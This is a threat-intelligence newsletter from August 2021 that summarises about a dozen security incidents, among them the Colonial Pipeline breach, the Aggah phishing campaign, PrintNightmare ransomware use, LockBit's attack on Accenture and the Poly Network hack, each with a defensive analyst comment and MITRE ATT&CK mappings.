Anomali Cyber Watch: Aggah Using Compromised Websites to Target Businesses Across Asia, eCh0raix Targets Both QNAP and NAS, LockBit 2.0 Targeted Accenture, and More | Anomali

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Critical Infrastructure, Data Storage, LockBit, Morse Code, Ransomware, and Vulnerabilities. . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Colonial Pipeline Reports Data Breach After May Ransomware Attack

(published: August 16, 2021)

Colonial Pipeline, the largest fuel pipeline in the United States, is sending notification letters to 5,810 individuals affected by the data breach resulting from the DarkSide ransomware attack. During the incident, which occurred during May this year, DarkSide also stole roughly 100GB of files in about two hours. Right after the attack Colonial Pipeline took certain systems offline, temporarily halted all pipeline operations, and paid $4.4 million worth of cryptocurrency for a decryptor, most of it later recovered by the FBI. The DarkSide ransomware gang abruptly shut down their operation due to increased level of attention from governments, but later resurfaced under new name BlackMatter. Emsisoft CTO Fabian Wosar confirmed that both BlackMatter RSA and Salsa20 implementation including their usage of a custom matrix comes from DarkSide.
Analyst Comment: BlackMatter (ex DarkSide) group added "Oil and Gas industry (pipelines, oil refineries)" to their non-target list, but ransomware remains a significant threat given profitability and the growing number of ransomware threat actors with various levels of recklessness. Double-extortion schemes are adding data exposure to a company's risks. Stopping ransomware affiliates requires defense in depth including: patch management, enhancing your Endpoint Detection and Response (EDR) tools with ThreatStream, the threat intelligence platform (TIP), and utilizing data loss prevention systems (DLP).
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Darkside, BlackMatter, Colonial Pipeline, Oil and Gas, Ransomware, Salsa20, Data Breach, USA

Indra — Hackers Behind Recent Attacks on Iran

(published: August 14, 2021)

Check Point Research discovered that a July 2021 cyber attack against Iranian railway system was committed by Indra, a non-government group. The attackers had access to the targeted networks for a month and then deployed a previously unseen file wiper called Meteor effectively disrupting train service throughout the country. Previous versions of the Indra wiper named Stardust and Comet were seen in Syria, where Indra was attacking oil, airline, and financial sectors at least since 2019.
Analyst Comment: It is concerning that even non-government threat actors can damage a critical infrastructure in a large country. Similar to ransomware protection, with regards to wiper attacks organizations should improve their intrusion detection methods and have a resilient backup system.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Subvert Trust Controls - T1553
Tags: Indra, Meteor, Iran, Syria, Wiper, Trojan.Win32.BreakWin, Stardust, CometRailway, Critical Infrastructure, Oil And Gas, Airline, Finance

Aggah Using Compromised Websites to Target Businesses Across Asia, Including Taiwan Manufacturing Industry

(published: August 12, 2021)

Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry in Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with Aggah. Anomali researchers found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads; delivering Warzone RAT. Historically Aggah has used Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, but in this campaign they moved to using compromised websites.
Analyst Comment: Aggah group avoids security measures by utilising compromised websites and implementing AMSI (Anti Malware Scripting Interface) bypass. Possible mitigations include secure sandboxed handling of unrequested emails, and network monitoring for malicious PowerShell activity.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] Abuse Elevation Control Mechanism - T1548 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Ingress Tool Transfer - T1105
Tags: Aggah, Urdu, Pakistan, Taiwan, Korea, Manufacture, APT, Warzone RAT, PowerShell, AMSI Bypass

Attackers Use Morse Code, Other Encryption Methods in Evasive Phishing Campaign

(published: August 12, 2021)

Microsoft researchers monitored a targeted, invoice-themed XLS.HTML phishing campaign aimed at stealing geolocation, IP data, and credentials for further exploitation. These attackers changed obfuscation and encryption mechanisms every 37 days on average. This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving. The attackers moved from using plaintext HTML code to using multiple encoding techniques. The HTML attachment is divided into up to four segments, including the JavaScript files used to steal passwords (or links to such JS files). It is common for this group to use different encoding mechanisms for different segments inside the same attachment, often combining two encryption methods including old and unusual encryption methods like Morse code, and more common ASCII, Base64, Char, Escape, and UTF-16 char. encoding.
Analyst Comment: Multilayer obfuscation in HTML attachment can evade email and browser-based security solutions. On their own, the individual segments of the HTML file may appear harmless at the code level and may thus slip past conventional security solutions. Only when these segments are put together and properly decoded does the malicious intent show. Anomali ThreatStream users are equipped with ingested historic malware and network indicators, and can securely detonate email attachments in a sandbox environment.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105
Tags: XLS.HTML, Phishing, Spear Phishing, Encoding, Obfuscation, Morse Code, Base64, ASCII, Escape, UTF-16

Vice Society Leverages PrintNightmare In Ransomware Attacks

(published: August 12, 2021)

Vice Society is a relatively new ransomware gang that first appeared in June 2021. Following the lead of Conti and Magniber, the Vice Society is now also actively exploiting Windows print spooler PrintNightmare vulnerability for lateral movement through their victims' networks. PrintNightmare is a set of recently disclosed security flaws (CVE-2021-1675, CVE-2021-34527 and ​​CVE-2021-36958) found to affect the Windows Print Spooler service, Windows print drivers, and Windows Point and Print feature.
Analyst Comment: As proof of concept (POC) exploits for PrintNightmare leaked, the number of ransomware groups attempting to take advantage of unpatched networks is likely to grow. If users have not already, they should download the latest patch for PrintNightmare from Microsoft. Utilize multi-factor authentication, look at egress filtering for firewalls, utilize an endpoint detection response platform that detects living-off-the-land binary (LoLBin) tactic and malware implants, and keep up-to-date and offline backups.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] Domain Trust Discovery - T1482 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Lateral Tool Transfer - T1570 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068
Tags: Vice Society, PrintNightmare, Conti, Magniber, Ransomware, CVE-2021-36958, CVE-2021-34527, CVE-2021-1675, LoLBin

Accenture Says Lockbit Ransomware Attack Caused 'No Impact'

(published: August 11, 2021)

A ransomware group known as LockBit 2.0 (LockBit) targeted the global IT consultancy company, Accenture. The group threatened to publish "all available data" from Accenture unless it paid a $50 (USD) million ransom. Accenture spokesperson initially downplayed the incident, saying it had little impact on the company's operations. The first small batch of leaked information included PowerPoint presentations and case studies. According to threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners. Another research firm, Cyble, claims that LockBit stole 6 TB of data.
Analyst Comment: Accenture having a resilient backup system helped them to restore operations after some of their computers were encrypted by the ransomware. Protection from ransomware-as-a-service (RaaS) groups like LockBit requires multi-layered protection because their affiliates are flexible in the intrusion methods. While LockBit often exploits existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, the group has also added insiders into their arsenal.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: LockBit, Lockbit 2.0, Ransomware, RaaS, CVE-2018-13379, Accenture, FortiOS

New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices

(published: August 10, 2021)

Unit 42 researchers have discovered a new variant of eCh0raix ransomware, which was first reported on by Anomali Threat Research in July 2019. Unlike earlier variants, this one is capable of targeting both Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. Attackers are also leveraging CVE-2021-28799 (an improper authorization vulnerability) to deliver the new ransomware variant to QNAP devices. Currently, at least 250,000 data storage devices are exposed to the attacks demonstrating significant risks to small office and home office (SOHO) and small business sectors.
Analyst Comment: Backing up your data to an internet connected device still leaves it vulnerable to ransomware attacks. Make sure you install security updates. Create complex login passwords to make brute-forcing more difficult for attackers. Allow public admin access to a backup device only if necessary and restrict it to specific whitelisted IP addresses.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Process Discovery - T1057
Tags: eCh0raix, CVE-2021-28799, Ransomware, AES Encryption, Tor

UNC215: Spotlight on a Chinese Espionage Campaign in Israel

(published: August 10, 2021)

Chinese espionage group UNC215 leveraged remote desktop protocols to access an Israeli government network using stolen credentials from trusted third parties, according to FireEye researchers. The data revealed multiple, concurrent operations against Israeli government institutions, IT providers, and telecommunications entities beginning in January 2019. The group has previously targeted private companies, governments, and various organizations in the Middle East, Europe, Asia, and North America. Since 2019, UNC215 has been exploiting the Microsoft SharePoint vulnerability CVE-2019-0604 to install web shells. The group heavily relies on custom tools such as a non-public scanner WheatScan, FocusFjord backdoor, and HyperBro, a backdoor with keylogging capabilities. Mandiant researchers have low confidence that UNC215 is associated with Chinese group APT27 (Emissary Panda) that previously targeted the same geographic regions.
Analyst Comment: Chinese cyberespionage activity often follows Chinese strategic interests and investments such as the Belt and Road Initiative (BRI). Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Anomali Match provides real time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Trusted Relationship - T1199 | [MITRE ATT&CK] Indirect Command Execution - T1202 | [MITRE ATT&CK] Domain Trust Discovery - T1482 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] Subvert Trust Controls - T1553 | [MITRE ATT&CK] Inter-Process Communication - T1559 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Hijack Execution Flow - T1574
Tags: UNC215, WheatScan, FocusFjord, HyperBro, CVE-2019-0604, APT27, Israel, Government, Emissary Panda, APT, LuckyMouse, Iron Tiger, Bronze Union, China, Middle East, Central Asia

1M Stolen Credit Cards Hit Dark Web for Free

(published: August 10, 2021)

Researchers from threat intelligence firm Cyble noticed the leak of payment card data during a routine monitoring of cybercrime and Dark Web marketplaces. The cards were published on an underground card-selling market, AllWorld[.]Cards. The data was stolen between 2018 and 2019 and includes the following fields: address, card number, CVV, email, expiration date, phone number, and ZIP code. This batch represented a vast variety of banks from a vast number of countries, but top affected were India, Mexico, the US, Australia, and Brazil.
Analyst Comment: Millions of credit card data lines get compromised every month. Financial and retail organizations should monitor for top threats including point-of-sale (POS) card skimmers, online skimmers (Magecart attacks) and banking trojans. Users should watch on their financial statements, and contact the issuing  bank immediately upon noticing any suspicious activity.   
Tags: Carding, Finance, India, Mexico, Australia, Brazil, USA, Magecart, North America

Over $600 Million Reportedly Stolen in Cryptocurrency Hack

(published: August 10, 2021)

On August 10, 2021, Poly Network announced that it suffered an attack that resulted in cryptocurrency assets having been transferred into the attackers' wallets. The value of stolen assets to be at least $611 million, making this the largest Decentralized Finance (DeFi) hack so far. According to SlowMist, a Chinese Blockchain cybersecurity team, the attacker transacted in Monero (XMR) originally and exchanged the funds later for BNB, ETH, MATIC, and other tokens used to fund the attack. Slowmist claimed to know the attacker's email address, IP, and device fingerprint. The attackers were not using a leaked private key. Instead they found a way to replace the “keeper” of the EthCrossChainData contract by carefully crafting requests exploiting certain cross-chain verification and management functions, and possibly using hash collision.
Analyst Comment: Researchers working together with blockchain industry stakeholders were able to blacklist and return a portion of the stolen funds. According to the BBC, Poly Network offered the attacker $500,000 to return the $600 million in crypto-assets, and most of the funds were returned. While many blockchain-related companies fell victims to typical cybersecurity attack vectors such as spear phishing, the new smart contract architecture creates its own vulnerabilities that hackers can and do exploit.
MITRE ATT&CK: [MITRE ATT&CK] Data Manipulation - T1565 | [MITRE ATT&CK] Account Access Removal - T1531
Tags: Smart Contract, Poly Network, Blockchain, Cryptocurrency, ETH, Ethereum, Binance Chain, Polygon, Monero

FlyTrap Android Malware Compromises Thousands of Facebook Accounts

(published: August 9, 2021)

Zimperium’s zLabs mobile threat research team recently found a new Android trojan, dubbed FlyTrap, that's spread to more than 10,000 victims via malicious apps on third-party app stores, sideloaded apps and hijacked Facebook accounts. The malware operated out of Vietnam, is part of a family of trojans that use social engineering to take over Facebook accounts. Instead of using phishing domains, FlyTrap opens the legit Facebook URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address.
Analyst Comment: Google Play removed the malicious apps after Zimperium zLabs gave it the heads-up, but the FlyTrap-infected apps are still available on third-party app stores. Android users can disallow installation of any app from an untrusted source. If you suspect that your Facebook account has been connected to a malicious party, immediately change your passwords and enable MFA if not already in use.
MITRE ATT&CK: [MITRE ATT&CK] Automated Collection - T1119 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: FlyTrap, Android, Facebook, Vietnam, JavaScript Injection


Anomali Cyber Watch

Related Content

Get the Anomali Newsletter

The latest Anomali updates and cybersecurity news, delivered straight to your inbox each month.